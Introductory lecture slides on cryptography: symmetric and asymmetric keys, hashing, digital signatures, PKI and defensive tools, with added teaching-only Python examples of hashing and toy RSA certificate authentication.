Page 93: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

CRYPTOGRAPHY /

ENCRYPTION #CyberSecurity


Page 94: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Agenda

Introduction to Cryptography / Encryption

Digital Signatures

Public Key infrastructure

Applications of Cryptography

Tools and techniques of Cryptography


Page 95: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Introduction to Cryptography / Encryption

• Definition: "Cryptography is the science of using mathematics to encrypt and decrypt data." (Phil Zimmermann)

• "Cryptography is the art and science of keeping messages secure." (Bruce Schneier)

• "The art and science of concealing messages to introduce secrecy in information security is recognized as cryptography."

• A message is plaintext (sometimes called cleartext). The process of disguising a message in such a way as to hide its substance is encryption. An encrypted message is ciphertext. The process of turning ciphertext back into plaintext is decryption.

Page 96: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Introduction to Cryptography / Encryption

• A cipher (or cypher) is an algorithm for performing encryption or decryption—a series of well-defined steps that can be followed as a procedure

• A cryptosystem is an implementation of cryptographic techniques and their accompanying infrastructure to provide information security services.

• A cryptosystem is also referred to as a cipher system.


Page 97: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Introduction to Cryptography / Encryption

• The set of rules used for encrypting any message is called a “key”. We also need a key to decrypt the message.

• There are three types of cryptography:

• Symmetric Key Cryptography

• Also known as Secret Key Cryptography or Conventional Cryptography, Symmetric Key Cryptography is an encryption system in which the sender and receiver of a message share a single, common key that is used to encrypt and decrypt the message.

• The algorithm used is also known as a secret key algorithm, or sometimes a symmetric algorithm.

• A key is a piece of information (a parameter) that determines the functional output of a cryptographic algorithm or cipher.


Page 98: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Introduction to Cryptography / Encryption

• Asymmetric Key Cryptography

• Asymmetric cryptography, also known as Public-key cryptography, refers to a cryptographic algorithm which requires two separate keys, one of which is private and one of which is public.

• The public key is used to encrypt the message and the private one is used to decrypt the message.

• Hash Functions

• A cryptographic hash function is a hash function that takes an arbitrary block of data and returns a fixed-size bit string, the cryptographic hash value, such that any (accidental or intentional) change to the data will (with very high probability) change the hash value.

• The data to be encoded are often called the message, and the hash value is sometimes called the message digest or simply digest.
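An added illustration of the two hash-function properties just stated (fixed digest size, and any change to the data changing the digest); it is not part of the slides, and the two transaction messages are constructed sample input.

```python
import hashlib

# Added example, not from the slides: measures how much a SHA-256 digest
# changes when a single character of the message changes.
def sha256_hex(data: bytes) -> str:
    """Hex digest; always 64 hex characters (256 bits) whatever the input size."""
    return hashlib.sha256(data).hexdigest()

def differing_bits(a: bytes, b: bytes) -> int:
    """Hamming distance between the SHA-256 digests of two messages (0..256)."""
    da = int.from_bytes(hashlib.sha256(a).digest(), "big")
    db = int.from_bytes(hashlib.sha256(b).digest(), "big")
    return bin(da ^ db).count("1")

if __name__ == "__main__":
    # Constructed messages: one digit differs, as in a tampered transaction.
    original = b"Transfer 100 to account 12345"
    altered = b"Transfer 900 to account 12345"
    print(sha256_hex(original))
    print(sha256_hex(altered))
    print(differing_bits(original, altered), "of 256 digest bits differ")
    print(len(sha256_hex(b"x" * 100_000)), "hex chars for a 100 KB input")
```

A one-character edit flips roughly half of the digest bits, which is why comparing digests detects both accidental corruption and deliberate tampering.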


Page 99: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Digital Signatures

• Example of Asymmetric Key Cryptography: DSS

• Digital Signature Standard (DSS) is the digital signature algorithm (DSA) developed by the U.S. National Security Agency (NSA) to generate a digital signature for the authentication of electronic documents.

• DSS was put forth by the National Institute of Standards and Technology (NIST) in 1994, and has become the United States government standard for authentication of electronic documents.

• DSS is specified in Federal Information Processing Standard (FIPS) 186.


Page 100: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Public Key infrastructure

• A public key infrastructure (PKI) is a set of roles, policies, hardware, software and procedures needed to create, manage, distribute, use, store and revoke digital certificates and manage public-key encryption.

• A public key infrastructure relies on digital signature technology, which uses public key cryptography.

• The basic idea is that the secret key of each entity is only known by that entity and is used for signing. This key is called the private key.

• There is another key derived from it, called the public key, which is used for verifying signatures but cannot be used to sign. This public key is made available to anyone, and is typically included in the certificate document.

• The trusted party signing the document associating the key with the device is called a certificate authority (CA).

• The certificate authority also has a cryptographic key that it uses for signing these documents. These documents are called Digital certificates.


Page 101: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Applications of Cryptography

• Authentication/Digital Signatures:

• Before decrypting a message using a public key, one needs assurance that the message is coming from a trusted source.

• To address this weakness, the standards community has invented objects such as certificates and digital signatures.

• Time Stamping

• Time stamping is a technique that can certify that a certain electronic document or communication existed or was delivered at a certain time.

• Electronic Money

• Encryption is used in electronic money schemes to protect conventional transaction data like account numbers and transaction amounts; digital signatures can replace handwritten signatures or credit-card authorizations; and public-key encryption can provide confidentiality.

• Secure Network Communications

• Secure Sockets Layer (SSL) is a public-key protocol for providing data security layered between TCP/IP and application protocols (such as HTTP, Telnet, NNTP, or FTP).


Page 102: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Applications of Cryptography

• Kerberos is an authentication service developed by MIT which uses secret-key ciphers for encryption and authentication. Kerberos was designed to authenticate requests for network resources and does not authenticate authorship of documents.

• Anonymous Remailers

• A remailer is a free service that strips off the header information from an electronic message and passes along only the content.

• Thus only the person to whom you have sent mail knows your identity, not the entire chain.

• Disk Encryption

• Disk encryption programs encrypt your entire hard disk so that you don't have to worry about leaving any traces of the unencrypted data on your disk.

• Cryptography can also be used to encrypt files. In this case, Pretty Good Privacy (PGP) uses the user's private key along with a user-supplied password to encrypt the file. The same password and key are used to unlock the file.


Page 103: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Tools and Techniques of Cryptography

• Cyber security professionals can use multiple cryptography tools to build and fortify their computer system defenses. Here’s a look at five key tools that cyber security specialists can integrate into their strategies.

• Security Tokens

• A security token is a physical device that holds information that authenticates a person’s identity. The owner plugs the security token into a system — via a computer’s USB port, for example — to gain access to a network service. It’s like swiping a security card to get into an office. A bank might issue security tokens to customers to use as an extra layer of security when they log in to their accounts.

• Key-Based Authentication

• Key-based authentication is a method that employs asymmetric algorithms to confirm a client’s identity and can be an effective substitute for using passwords to verify a client. The key factors at play in key-based authentication are public and private keys that confirm identity.

• In public key authentication, each user is given a pair of asymmetric keys. Users store their public keys in each system they want access to, while the private keys are safely maintained on the device with which the user connects to the secured systems.

• When connecting, the server authenticates the user with the public key and asks the user to decrypt it using the corresponding private key.
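An added end-to-end illustration, not code from the slides, tying together the Digital Signatures slide (page 99), the Public Key infrastructure slide (page 100) and the key-based authentication bullets above: a CA signs a certificate binding a name to a public key, and a server first checks that certificate against the CA's public key and then checks the client's signature on a fresh challenge. It assumes textbook RSA with fixed Mersenne primes and no padding as a stand-in for a real signature scheme such as DSA, and the subject name "alice" and all function names are constructed for the example.

```python
import hashlib
import os
# Added toy illustration, not the slides' own code. Textbook RSA with fixed
# Mersenne primes and no padding: for teaching only, never for real systems.
CA_PRIMES = (2**31 - 1, 2**61 - 1)      # two known Mersenne primes (CA key)
USER_PRIMES = (2**89 - 1, 2**107 - 1)   # two more, so the user key differs
E = 65537

def make_keypair(p, q, e=E):
    """Return ((n, e), (n, d)): the public key and the private key."""
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))   # d = e^-1 mod phi(n)
    return (n, e), (n, d)

def digest_int(message: bytes, n: int) -> int:
    """SHA-256 the message, then reduce into Z_n (toy stand-in for padding)."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n

def sign(message: bytes, private_key) -> int:
    n, d = private_key                  # only the holder of d can do this
    return pow(digest_int(message, n), d, n)

def verify(message: bytes, signature: int, public_key) -> bool:
    n, e = public_key                   # anyone holding (n, e) can check
    return pow(signature, e, n) == digest_int(message, n)

def cert_bytes(subject: str, public_key) -> bytes:
    """Canonical encoding of what the CA vouches for: a name and a public key."""
    return f"{subject}|{public_key[0]}|{public_key[1]}".encode()

def issue_certificate(subject: str, public_key, ca_private) -> dict:
    """The CA binds a subject name to a public key by signing that binding."""
    return {"subject": subject, "public_key": public_key,
            "ca_signature": sign(cert_bytes(subject, public_key), ca_private)}

def authenticate(cert: dict, client_private, ca_public, challenge=None) -> bool:
    """Key-based login: check the certificate, then a signature on a fresh nonce."""
    challenge = challenge or os.urandom(16)   # server picks a new nonce each time
    if not verify(cert_bytes(cert["subject"], cert["public_key"]),
                  cert["ca_signature"], ca_public):
        return False                          # certificate altered or not CA-issued
    response = sign(challenge, client_private)   # computed on the client side
    return verify(challenge, response, cert["public_key"])

if __name__ == "__main__":
    ca_pub, ca_priv = make_keypair(*CA_PRIMES)
    alice_pub, alice_priv = make_keypair(*USER_PRIMES)
    cert = issue_certificate("alice", alice_pub, ca_priv)   # constructed subject
    print(authenticate(cert, alice_priv, ca_pub))           # True
```

Editing the certificate's subject, or answering the challenge with a private key that does not match the certified public key, makes `authenticate` return False, which is exactly the check a server relies on instead of a password.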


Page 104: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Tools and Techniques of Cryptography

• Docker

• The Docker software platform builds applications based on containers: small self-contained environments that share an operating system kernel but otherwise run in isolation from one another. By their nature, Docker containers are secure. More security can be added by enabling one of several applications that fortify the system.

• Java Cryptography Architecture

• The popular Java programming language has built-in cryptographic functions. The Java Cryptography Architecture (JCA) is integrated with the core Java application programming interface (API). The JCA contains APIs that handle security functions that include encryption, managing keys, generating random numbers securely and validating certificates. These APIs provide a way for developers to build security into application code.

• SignTool

• Another security tool embedded in an operating system is Microsoft SignTool (SignTool.exe). A command-line tool, SignTool can digitally sign and time-stamp files and verify signatures in files. It’s automatically installed with Microsoft Visual Studio, a software development environment. SignTool allows software developers to certify that the code they developed is theirs and that it hasn’t been tampered with since it was published.


Page 105: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

THANK YOU ALL ……….

Questions??????
